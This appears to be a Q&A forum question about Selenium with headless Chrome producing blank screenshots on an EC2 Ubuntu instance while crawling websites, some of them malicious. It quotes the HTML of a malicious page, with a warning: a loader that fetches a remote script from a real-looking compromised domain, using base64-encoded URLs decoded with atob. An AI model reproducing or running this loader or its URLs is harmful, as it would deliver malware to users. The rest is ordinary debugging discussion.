0

I am using the Python bindings for Selenium to load websites (they may be malicious, benign, or greyware) for a project I'm building.

While the majority of pages behave identically (whether they're SPA or traditional HTML pages), I've noticed that there are at least a subset that -- on an Amazon EC2 t2.micro instance of Ubuntu Jammy (ubuntu-jammy-22.04-amd64-server-20220609 with Chrome v. 112.0.5615.121 and Chromedriver v. 112.0.5615.49) -- show blank screenshots when I use the get_screenshot_as_base64() call with a Chrome driver:

Blank screenshot on Ubuntu EC2 instance

Testing locally on a Mac M1 (running OS X Monterey with Chrome v. 112.0.5615.137 and Chromedriver v. 112.0.5615.49) with the exact same code (provided below), however, does not create a blank screenshot:

Non-blank screenshot on Mac M1

Code:

def crawl_test(url, sshot_outfile="test.png"):
    from web_driver_wrapper import WebDriverWrapper
    screenshot = None
    try:
        import base64
        with WebDriverWrapper() as driver_wrapper:
            driver = driver_wrapper.driver
            driver.get(url)
            tries = 10  # try for 5 seconds, essentially
            try:
                screenshot = driver.get_screenshot_as_base64()
                while screenshot and
                      screenshot.endswith(config.SCREENSHOT_BYTES_BLANK)
                      and tries > 0:
                    logger.info(f"Trying to get non-empty screenshot, attempt #{10-tries}")
                    time.sleep(0.5)
                    screenshot = driver.get_screenshot_as_base64()  # try capturing again
                    tries -= 1
        with open(sshot_outfile, 'wb') as f:
            f.write(base64.b64decode(screenshot))

The WebDriverWrapper() call mentioned above essentially looks like the following:

    chrome_options.add_argument("--headless")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--disable-gpu")
    chrome_options.add_argument("--disable-dev-tools")
    chrome_options.add_argument("--no-zygote")
    chrome_options.add_argument("--single-process")
    chrome_options.add_argument("window-size=1080x768")
    chrome_options.add_argument("--remote-debugging-port=9222")
    input_driver = webdriver.Chrome(chromedriver_location, options=chrome_options)
    return input_driver

The chromedriver_location variable is passed in based on whichever OS I'm using and works fine.

While I haven't evaluated all of the cases, I know that at least one of the relevant scenarios where this difference occurs is because the Ubuntu version does not seem to evaluate the script in the <head> tag, whereas the Mac version does. The content of that page source is as follows (note that the html below is from a malicious website, so please do not run unless you know what you're doing!)

<html><head><script src="https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js"></script></head><body><input id="b64u" type="hidden" value="aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA=="/><script>const per = document.createElement("script");per.src=atob("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw==");document.head.appendChild(per);</script></body></html>

On the Macbook example, it takes about 2 loops to properly evaluate the script and send me to the final page. However, on the EC2 instance it simply never changes. I've tried up to ~50 seconds of looping on EC2 with no change, just in case it was a resources issue.

In addition, I have tried the following, each of which elicited no change to the behavior on the Ubuntu instance:

  1. a few different versions of Chrome/Chromedriver
  2. the Service-based setup referenced here
  3. using xvfb-run as described here
  4. using the Remote class of Selenium's webdriver as described at the end of this article

At this point, I've exhausted all of my expertise and Googling, and I'm hoping some fantastic person out there has run into and overcome this issue. Thanks in advance for any of your time!

  • I haven't been able to confirm it 100%, but in at least 2 cases (the above being one case) this is due to the EC2 instance receiving a 403 (Forbidden) when the local Macbook receives a 200 OK. So hopefully the issue is that I'm being IP blocked and not actually an issue with the driver. – another_user Apr 24 '23 at 16:45

0 Answers0